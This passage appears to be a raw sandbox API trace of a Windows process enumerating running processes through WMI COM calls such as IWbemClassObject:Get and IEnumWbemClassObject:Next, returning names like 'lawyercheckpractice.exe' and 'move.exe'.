This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.148] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.148] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.148] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.148] IWbemClassObject:Get (in: This=0x595930, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bff6c*=0, plFlavor=0x27bff70*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="lawyercheckpractice.exe", varVal2=0x0), pType=0x27bff6c*=8, plFlavor=0x27bff70*=0) returned 0x0 [0279.148] SysStringByteLen (bstr="lawyercheckpractice.exe") returned 0x2e [0279.148] SysStringByteLen (bstr="lawyercheckpractice.exe") returned 0x2e [0279.148] IWbemClassObject:Get (in: This=0x595930, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bff6c*=8, plFlavor=0x27bff70*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="lawyercheckpractice.exe", varVal2=0x0), pType=0x27bff6c*=8, plFlavor=0x27bff70*=0) returned 0x0 [0279.148] SysStringByteLen (bstr="lawyercheckpractice.exe") returned 0x2e [0279.148] SysStringByteLen (bstr="lawyercheckpractice.exe") returned 0x2e [0279.148] CoTaskMemAlloc (cb=0x4) returned 0x56ea1f0 [0279.148] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56ea1f0, puReturned=0x27bb39c | out: apObjects=0x56ea1f0*=0x595ac8, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.149] IUnknown:QueryInterface (in: This=0x595ac8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x595ac8) returned 0x0 [0279.149] IUnknown:QueryInterface (in: This=0x595ac8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.149] IUnknown:QueryInterface (in: This=0x595ac8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.150] IUnknown:AddRef (This=0x595ac8) returned 0x3 [0279.150] IUnknown:QueryInterface (in: This=0x595ac8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.150] IUnknown:QueryInterface (in: This=0x595ac8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.150] IUnknown:QueryInterface (in: This=0x595ac8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x595acc) returned 0x0 [0279.150] IMarshal:GetUnmarshalClass (in: This=0x595acc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.150] IUnknown:Release (This=0x595acc) returned 0x3 [0279.150] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.150] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.150] IUnknown:QueryInterface (in: This=0x595ac8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.150] IUnknown:Release (This=0x595ac8) returned 0x2 [0279.150] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.150] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.150] IUnknown:QueryInterface (in: This=0x595ac8, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x595ac8) returned 0x0 [0279.150] IUnknown:AddRef (This=0x595ac8) returned 0x4 [0279.150] IUnknown:Release (This=0x595ac8) returned 0x3 [0279.150] IUnknown:Release (This=0x595ac8) returned 0x2 [0279.150] CoTaskMemFree (pv=0x56ea1f0) [0279.150] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.151] IUnknown:AddRef (This=0x595ac8) returned 0x3 [0279.151] IWbemClassObject:Get (in: This=0x595ac8, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.151] IWbemClassObject:Get (in: This=0x595ac8, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2316\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.151] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2316\"") returned 0x66 [0279.151] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2316\"") returned 0x66 [0279.151] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.151] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.151] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.151] IUnknown:Release (This=0x500344) returned 0x1 [0279.152] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56ea1f0) returned 0x0 [0279.152] WbemDefPath:IUnknown:QueryInterface (in: This=0x56ea1f0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.152] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56ea1f0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a9878) returned 0x0 [0279.152] WbemDefPath:IUnknown:Release (This=0x56ea1f0) returned 0x0 [0279.152] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9878, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a9878) returned 0x0 [0279.153] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9878, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.153] WbemDefPath:IUnknown:AddRef (This=0x5a9878) returned 0x3 [0279.153] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9878, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.153] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9878, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.153] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9878, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56ea200) returned 0x0 [0279.153] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56ea200, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.153] WbemDefPath:IUnknown:Release (This=0x56ea200) returned 0x3 [0279.153] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.153] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.153] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9878, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.153] WbemDefPath:IUnknown:Release (This=0x5a9878) returned 0x2 [0279.153] WbemDefPath:IUnknown:Release (This=0x5a9878) returned 0x1 [0279.153] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.153] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.153] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9878, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a9878) returned 0x0 [0279.153] WbemDefPath:IUnknown:AddRef (This=0x5a9878) returned 0x3 [0279.153] WbemDefPath:IUnknown:Release (This=0x5a9878) returned 0x2 [0279.153] WbemDefPath:IWbemPath:SetText (This=0x5a9878, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2316\"") returned 0x0 [0279.154] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.154] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.154] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.154] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.154] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.154] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.154] IWbemClassObject:Get (in: This=0x595ac8, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c0814*=0, plFlavor=0x27c0818*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="move.exe", varVal2=0x0), pType=0x27c0814*=8, plFlavor=0x27c0818*=0) returned 0x0 [0279.154] SysStringByteLen (bstr="move.exe") returned 0x10 [0279.154] SysStringByteLen (bstr="move.exe") returned 0x10 [0279.154] IWbemClassObject:Get (in: This=0x595ac8, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c0814*=8, plFlavor=0x27c0818*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="move.exe", varVal2=0x0), pType=0x27c0814*=8, plFlavor=0x27c0818*=0) returned 0x0 [0279.154] SysStringByteLen (bstr="move.exe") returned 0x10 [0279.154] SysStringByteLen (bstr="move.exe") returned 0x10 [0279.154] CoTaskMemAlloc (cb=0x4) returned 0x56ea230 [0279.154] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56ea230, puReturned=0x27bb39c | out: apObjects=0x56ea230*=0x595c60, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.155] IUnknown:QueryInterface (in: This=0x595c60, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x595c60) returned 0x0 [0279.155] IUnknown:QueryInterface (in: This=0x595c60, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.155] IUnknown:QueryInterface (in: This=0x595c60, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.155] IUnknown:AddRef (This=0x595c60) returned 0x3 [0279.155] IUnknown:QueryInterface (in: This=0x595c60, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.155] IUnknown:QueryInterface (in: This=0x595c60, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.155] IUnknown:QueryInterface (in: This=0x595c60, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x595c64) returned 0x0 [0279.156] IMarshal:GetUnmarshalClass (in: This=0x595c64, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.156] IUnknown:Release (This=0x595c64) returned 0x3 [0279.156] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.156] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.156] IUnknown:QueryInterface (in: This=0x595c60, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.156] IUnknown:Release (This=0x595c60) returned 0x2 [0279.156] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.156] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.156] IUnknown:QueryInterface (in: This=0x595c60, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x595c60) returned 0x0 [0279.156] IUnknown:AddRef (This=0x595c60) returned 0x4 [0279.156] IUnknown:Release (This=0x595c60) returned 0x3 [0279.156] IUnknown:Release (This=0x595c60) returned 0x2 [0279.156] CoTaskMemFree (pv=0x56ea230) [0279.156] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.156] IUnknown:AddRef (This=0x595c60) returned 0x3 [0279.156] IWbemClassObject:Get (in: This=0x595c60, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.157] IWbemClassObject:Get (in: This=0x595c60, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2324\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.157] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2324\"") returned 0x66 [0279.157] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2324\"") returned 0x66 [0279.157] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.157] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.157] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.157] IUnknown:Release (This=0x500344) returned 0x1 [0279.158] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56ea230) returned 0x0 [0279.158] WbemDefPath:IUnknown:QueryInterface (in: This=0x56ea230, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.158] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56ea230, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a9958) returned 0x0 [0279.158] WbemDefPath:IUnknown:Release (This=0x56ea230) returned 0x0 [0279.158] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9958, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a9958) returned 0x0 [0279.158] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9958, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.159] WbemDefPath:IUnknown:AddRef (This=0x5a9958) returned 0x3 [0279.159] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9958, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.159] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9958, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.159] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9958, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x596c38) returned 0x0 [0279.159] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x596c38, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.159] WbemDefPath:IUnknown:Release (This=0x596c38) returned 0x3 [0279.159] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.159] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.159] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9958, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.159] WbemDefPath:IUnknown:Release (This=0x5a9958) returned 0x2 [0279.159] WbemDefPath:IUnknown:Release (This=0x5a9958) returned 0x1 [0279.159] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.159] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.159] 